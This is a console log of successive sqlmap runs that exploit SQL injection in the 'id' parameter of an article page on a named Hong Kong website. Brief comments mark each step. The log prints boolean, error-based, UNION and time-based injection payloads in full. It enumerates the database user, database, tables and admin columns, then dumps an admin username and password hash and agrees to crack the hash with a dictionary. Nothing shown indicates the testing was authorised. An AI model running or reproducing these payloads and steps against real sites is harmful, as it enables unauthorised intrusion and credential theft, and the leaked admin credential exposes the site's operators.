D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'

[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'

[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>